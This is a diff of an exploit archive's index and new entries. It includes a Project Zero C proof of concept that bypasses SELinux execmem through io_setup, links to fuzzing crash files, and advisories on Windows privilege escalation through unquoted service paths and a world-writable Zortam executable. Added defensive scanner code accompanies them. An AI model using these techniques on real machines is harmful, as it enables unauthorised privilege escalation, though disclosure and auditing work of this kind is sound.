38338,platforms/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,jsp,webapps,80
38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80
@ -35256,7 +35261,7 @@ id,file,description,date,author,platform,type,port
38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0
38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80
38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <= 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0
38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
@ -35781,7 +35786,7 @@ id,file,description,date,author,platform,type,port
39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver Denial of Service",2016-02-19,"Fitzl Csaba",windows,dos,0
39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0
39478,platforms/php/webapps/39478.txt,"SOLIDserver <= 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
@ -35851,7 +35856,7 @@ id,file,description,date,author,platform,type,port
39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
39552,platforms/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80
39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
@ -36000,7 +36005,7 @@ id,file,description,date,author,platform,type,port
39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,jsp,webapps,0
|
||||
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,ios,webapps,0
|
||||
|
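Review bot: the 39719 retitle in this hunk turns the inclusive range "Server 2008-2012" into "Server 2008 < 2012"; read literally, "<" excludes Server 2012, just as "7 < 10" excludes Windows 10, so if the intended meaning is "through", the title should use "<=" (the form this same catalogue uses in "DZS Videogallery <= 8.60") or keep the hyphen. The "x32" to "x86" correction is right. Not part of this change, but the context row 40094 (dated 2016-07-13) sits between 39719 and 39720, out of id order.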
@ -36086,7 +36091,7 @@ id,file,description,date,author,platform,type,port
39806,platforms/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39807,platforms/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39808,platforms/windows/webapps/39808.txt,"Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0

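Review bot: 39809 gets the same "Server 2008 < 2012" notation as 39719, with the same ambiguity between strict less-than and an inclusive range; whatever form is settled on for 39719 should be applied here in the same commit so the PowerShell and C# entries for MS16-032 read identically. Also context rather than part of this change: 39883 is inserted between 39808 and 39810, out of id order.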
@ -36342,7 +36347,7 @@ id,file,description,date,author,platform,type,port
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 / 11 - main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
40107,platforms/windows/local/40107.rb,"Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution (Metasploit)",2016-07-13,Metasploit,linux,remote,443
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0

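Review bot: for 40107 only the spacing around "<" changes, which is fine, but the title still reads "2008 < 2012" without "Server" while 39719 and 39809 read "Server 2008 < 2012", so the three MS16-032 entries differ in wording beyond the range notation. Suggest "Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64)" here too, with the same "<" versus "<=" decision applied to all three.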

47
platforms/linux/dos/40419.c
Executable file

@ -0,0 +1,47 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=854

SELinux has a set of permissions that can be used to prevent processes from creating executable
memory mappings that contain data controlled by the process (PROCESS__EXECMEM, PROCESS__EXECHEAP, ...).
These permissions, when applied correctly, make exploitation of memory corruption issues somewhat more
difficult and much more annoying.

When a process tries to map memory using sys_mmap_pgoff(), vm_mmap_pgoff() is called, which first
performs the LSM security check by calling security_mmap_file() and then calls do_mmap_pgoff(), which
takes care of the rest and does not rerun the same security check.

The syscall handler for io_setup() calls ioctx_alloc(), which calls aio_setup_ring(), which allocates
memory via do_mmap_pgoff() - the method that doesn't contain the security check.

aio_setup_ring() only requests that the memory is mapped as PROT_READ | PROT_WRITE; however, if the
process has called personality(READ_IMPLIES_EXEC) before, this will actually result in the creation
of a memory mapping that is both writable and executable, bypassing the SELinux restriction.

To verify: (note: I actually tested this without SELinux since the code looks pretty straightforward
and I don't want to figure out how to set up SELinux rules)

$ cat > iosetup.c
*/

#define _GNU_SOURCE
#include <linux/aio_abi.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <err.h>
#include <sys/personality.h>

int main(void) {
  aio_context_t ctx = 0;  /* io_setup() rejects a non-zero *ctxp with EINVAL */
  /* From here on, every new PROT_READ mapping in this process also gets PROT_EXEC. */
  personality(READ_IMPLIES_EXEC);
  /* The aio ring is mapped through do_mmap_pgoff(), i.e. without security_mmap_file(). */
  if (syscall(__NR_io_setup, 1, &ctx))
    err(1, "io_setup");
  /* Stay alive so the mapping can be inspected through /proc/<pid>/maps. */
  while (1) pause();
}

/*
$ gcc -o iosetup iosetup.c
$ ./iosetup &
[1] 4949
$ cat /proc/4949/maps | grep aio
7fa0b59c6000-7fa0b59c7000 rwxs 00000000 00:0b 36093330 /[aio] (deleted)
*/
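An added check, written for this page and not part of the Project Zero report above: a small scanner for the /proc/<pid>/maps format that counts mappings whose permission field contains both 'w' and 'x', optionally restricted to mappings whose path contains a given substring such as "[aio]". The sample maps text embedded in the block is constructed for this example (its /[aio] line copies the one in the output above, the other lines are made up). On Linux, main() repeats the report's two steps, personality(READ_IMPLIES_EXEC) followed by io_setup(), and then scans the live /proc/self/maps; on an affected kernel it reports the rwx aio ring, on a kernel where the ring is mapped without exec it reports none. The "[aio]" filter in main() is deliberate: after the personality() call, other mappings the process creates afterwards (heap growth, stdio buffers) can also come out executable, and those are not what the report is about. Function names, the 64 KiB read buffer and the use of SYS_io_setup with a plain unsigned long for the context are this example's choices.

```c
/* Added example (not from the Project Zero report): scan /proc/<pid>/maps text
 * for mappings that are both writable and executable, optionally filtered by a
 * path substring.  The sample below is constructed for this example; only the
 * /[aio] line copies a value shown in the report. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef __linux__
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/personality.h>
#endif

/* One maps line: "start-end perms offset dev inode [path]".
 * Returns 1 when perms contain both 'w' and 'x', 0 otherwise (or on a malformed
 * line).  When out_path is non-NULL the path part (possibly empty) is copied. */
int maps_line_is_wx(const char *line, char *out_path, size_t out_len) {
    unsigned long start = 0, end = 0;
    char perms[8];
    int consumed = 0;
    /* five fields, then %n records where the path (if any) begins */
    if (sscanf(line, "%lx-%lx %7s %*s %*s %*s%n", &start, &end, perms, &consumed) != 3
        || consumed == 0)
        return 0;
    (void)start; (void)end;                    /* parsed only to validate the line */
    if (out_path && out_len) {
        const char *path = line + consumed;
        while (*path == ' ') path++;           /* maps pads the path column with spaces */
        snprintf(out_path, out_len, "%s", path);
        out_path[strcspn(out_path, "\n")] = '\0';
    }
    return strchr(perms, 'w') != NULL && strchr(perms, 'x') != NULL;
}

/* Count W+X mappings in a whole maps buffer.  When path_filter is non-NULL,
 * only mappings whose path contains it are counted (e.g. "[aio]"). */
int count_wx_mappings(const char *maps, const char *path_filter) {
    int count = 0;
    const char *p = maps;
    while (*p) {
        char line[512], path[256];
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (maps_line_is_wx(line, path, sizeof path) &&
            (path_filter == NULL || strstr(path, path_filter) != NULL))
            count++;
        p = nl ? nl + 1 : p + strlen(p);
    }
    return count;
}

/* Constructed sample: two ordinary mappings, the rwx aio ring from the report,
 * and a stack mapping.  All addresses except the aio line are made up. */
static const char SAMPLE_MAPS[] =
    "00400000-00401000 r-xp 00000000 08:01 1234 /tmp/iosetup\n"
    "00600000-00601000 rw-p 00000000 08:01 1234 /tmp/iosetup\n"
    "7fa0b59c6000-7fa0b59c7000 rwxs 00000000 00:0b 36093330 /[aio] (deleted)\n"
    "7ffd1c000000-7ffd1c021000 rw-p 00000000 00:00 0 [stack]\n";

int main(void) {
#ifdef __linux__
    static char buf[1 << 16];
    unsigned long ctx = 0;   /* aio_context_t is an unsigned long; must be 0 on entry */
    FILE *f;
    size_t n;

    personality(READ_IMPLIES_EXEC);              /* step 1 of the report */
    if (syscall(SYS_io_setup, 1, &ctx) != 0) {   /* step 2: maps the aio ring */
        perror("io_setup");
        return 1;
    }
    f = fopen("/proc/self/maps", "r");
    if (!f) { perror("/proc/self/maps"); return 1; }
    n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    /* Filter on the aio ring so later heap/stdio mappings don't muddy the result. */
    printf("W+X aio ring mappings in this process: %d\n",
           count_wx_mappings(buf, "[aio]"));
    return 0;
#else
    printf("W+X mappings in the constructed sample: %d\n",
           count_wx_mappings(SAMPLE_MAPS, NULL));
    return 0;
#endif
}
```

To check a running process rather than this one, feed the contents of /proc/<pid>/maps to count_wx_mappings() with a NULL filter; any non-zero count on a SELinux-confined process with execmem denied is worth a closer look, since the LSM check was supposed to prevent exactly that mapping.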

9
platforms/multiple/dos/40420.txt
Executable file

@ -0,0 +1,9 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=857

The attached fuzz file causes memory corruption when decompressing embedded video content.

Fixed in the September update


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40420.zip

9
platforms/multiple/dos/40421.txt
Executable file

@ -0,0 +1,9 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=859

There is a crash when the AVC decoder attempts to free memory, likely indicating memory corruption.

Fixed in the September update


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40421.zip

60
platforms/windows/local/40417.txt
Executable file

@ -0,0 +1,60 @@
# Exploit Title: Wisecleaner Software Multiple Unquoted Service Path Elevation of Privilege
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.wisecleaner.com
# Software Link: http://www.wisecleaner.com/wise-disk-cleaner.html, http://www.wisecleaner.com/wise-care-365.html
# Version: Wise Care 365 4.27, Wise Disk Cleaner 9.29
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec


1. Description:

Two separate instances of unquoted service path privilege escalation have been discovered. The first is in Wise Care 365 4.27, which installs a vulnerable service named WiseBootAssistant. The second exists when Wise Disk Cleaner 9.29 installs SpyHunter 4, whose "SpyHunter 4 Service" is affected in the same way. Both services run as LocalSystem, and in both cases BINARY_PATH_NAME contains spaces but is not quoted, so Windows resolves it by trying the shorter prefixes (C:\Program.exe first) before the intended executable. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.

2. Proof

Wise Care 365 4.27 (WiseBootAssistant)

C:\>sc qc WiseBootAssistant
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WiseBootAssistant
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Wise\Wise Care 365\BootTime.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wise Boot Assistant
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


Wise Disk Cleaner 9.29 (bundled SpyHunter 4)

C:\>sc qc "SpyHunter 4 Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SpyHunter 4 Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
        LOAD_ORDER_GROUP   : Base
        TAG                : 0
        DISPLAY_NAME       : SpyHunter 4 Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


3. Exploit:

A successful attempt would require the local user to be able to place their
code at one of the paths Windows tries before the real binary (for
WiseBootAssistant: C:\Program.exe, C:\Program Files\Wise\Wise.exe or
C:\Program Files\Wise\Wise Care.exe), undetected by the OS or other security
applications, where it would be executed when the service starts, i.e. at
reboot, since both services are AUTO_START. On a default installation those
locations are writable only by administrators, so the attack depends on a
weakened ACL on C:\ or on the vendor's directories. If successful, the local
user's code would execute with the elevated privileges of the service
(LocalSystem).

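An added audit helper, written for this page and not part of the advisory: it takes the text of an `sc qc <service>` dump such as the ones above, extracts BINARY_PATH_NAME and SERVICE_START_NAME, and, when the path is unquoted and contains spaces, lists the executables Windows would try first (each prefix ending before a space, with ".exe" appended, which is the documented CreateProcess behaviour for an unquoted command line). The sample dump in the block is constructed for the example and copies the WiseBootAssistant values shown above; the decision to report only LocalSystem services, the function names and the 260-character path limit are this example's choices, not the advisory's. A listed candidate is only exploitable if the local user can actually create a file at that location, which on default ACLs they cannot, so the output is a list of places whose ACLs need checking, not a list of confirmed escalations.

```c
/* Added example (not from the advisory): audit `sc qc` output for an unquoted
 * service path with spaces and enumerate the prefix executables Windows tries
 * before the intended one.  The sample below is constructed for this example
 * and copies the WiseBootAssistant values the advisory shows. */
#include <stdio.h>
#include <string.h>

#define MAX_CANDIDATES 8
#define PATH_MAX_LEN 260

/* Copy the value of a "KEY : value" line from sc output into out.
 * Returns 1 when the key was found, 0 otherwise. */
int sc_field(const char *sc_output, const char *key, char *out, size_t out_len) {
    const char *p = strstr(sc_output, key);
    size_t n;
    if (!p) return 0;
    p += strlen(key);
    while (*p == ' ' || *p == ':') p++;        /* skip the padding and the colon */
    n = strcspn(p, "\r\n");
    if (n >= out_len) n = out_len - 1;
    memcpy(out, p, n);
    out[n] = '\0';
    while (n > 0 && out[n - 1] == ' ') out[--n] = '\0';
    return 1;
}

/* A path is at risk when it is not wrapped in quotes and contains a space. */
int is_unquoted_with_spaces(const char *path) {
    return path[0] != '"' && strchr(path, ' ') != NULL;
}

/* For an unquoted path with spaces, write the prefixes Windows tries first
 * ("C:\Program.exe", "C:\Program Files\Wise\Wise.exe", ...) into out.
 * Returns the number of candidates, 0 when the path is not at risk. */
int hijack_candidates(const char *path, char out[][PATH_MAX_LEN], int max_out) {
    int count = 0;
    const char *sp;
    if (!is_unquoted_with_spaces(path)) return 0;
    for (sp = strchr(path, ' '); sp && count < max_out; sp = strchr(sp + 1, ' ')) {
        size_t n = (size_t)(sp - path);
        if (n + 5 > PATH_MAX_LEN) break;      /* prefix + ".exe" + NUL must fit */
        memcpy(out[count], path, n);
        memcpy(out[count] + n, ".exe", 5);
        count++;
    }
    return count;
}

/* Audit one `sc qc` dump.  Returns the number of hijack candidates when the
 * service runs as LocalSystem from an unquoted path with spaces, else 0.
 * (Extend the account check for other privileged accounts as needed.) */
int audit_sc_output(const char *sc_output, char out[][PATH_MAX_LEN], int max_out) {
    char path[PATH_MAX_LEN], account[64];
    if (!sc_field(sc_output, "BINARY_PATH_NAME", path, sizeof path)) return 0;
    if (!sc_field(sc_output, "SERVICE_START_NAME", account, sizeof account)) return 0;
    if (strcmp(account, "LocalSystem") != 0) return 0;
    return hijack_candidates(path, out, max_out);
}

/* Constructed sample: the WiseBootAssistant dump from the advisory. */
static const char SAMPLE_SC_QC[] =
    "[SC] QueryServiceConfig SUCCESS\n"
    "\n"
    "SERVICE_NAME: WiseBootAssistant\n"
    "        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)\n"
    "        START_TYPE         : 2   AUTO_START\n"
    "        ERROR_CONTROL      : 1   NORMAL\n"
    "        BINARY_PATH_NAME   : C:\\Program Files\\Wise\\Wise Care 365\\BootTime.exe\n"
    "        LOAD_ORDER_GROUP   :\n"
    "        TAG                : 0\n"
    "        DISPLAY_NAME       : Wise Boot Assistant\n"
    "        DEPENDENCIES       :\n"
    "        SERVICE_START_NAME : LocalSystem\n";

int main(void) {
    char cand[MAX_CANDIDATES][PATH_MAX_LEN];
    int i, n = audit_sc_output(SAMPLE_SC_QC, cand, MAX_CANDIDATES);
    printf("%d hijack candidate(s) for the sample service:\n", n);
    for (i = 0; i < n; i++)
        printf("  %s\n", cand[i]);
    return 0;
}
```

On a real host, run `sc qc` for every name returned by `sc query` and pass each dump to audit_sc_output(); each reported candidate should then be checked with icacls to see whether a non-administrator can create a file there. The fix on the vendor side is to quote the path, e.g. `sc config WiseBootAssistant binPath= "\"C:\Program Files\Wise\Wise Care 365\BootTime.exe\""`, after which is_unquoted_with_spaces() returns 0.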
28
platforms/windows/local/40418.txt
Executable file

@ -0,0 +1,28 @@
# Exploit Title: Zortam Mp3 Media Studio 21.15 Insecure File Permissions Privilege Escalation
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.zortam.com/
# Software Link: http://www.zortam.com/download.html
# Version: Software Version 21.15
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
# Shout-out to carbonated and ozzie_offsec

1. Description:

Zortam Mp3 Media Studio installs by default to "C:\Program Files (x86)\Zortam Mp3 Media Studio\zmmspro.exe" (C:\Program Files\... on 32-bit Windows) with very weak file permissions: an explicit ACE grants BUILTIN\Users full control (F) of the executable, on top of the inherited read access every user already has. Any local user can therefore overwrite zmmspro.exe, and the replacement runs with the privileges of whichever other user, for example an administrator, next launches the application.

2. Proof

C:\Program Files\Zortam Mp3 Media Studio>cacls zmmspro.exe
C:\Program Files\Zortam Mp3 Media Studio\zmmspro.exe BUILTIN\Users:F
                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                     BUILTIN\Administrators:(ID)F
                                                     BUILTIN\Users:(ID)R


3. Exploit:

Simply replace zmmspro.exe and wait for execution.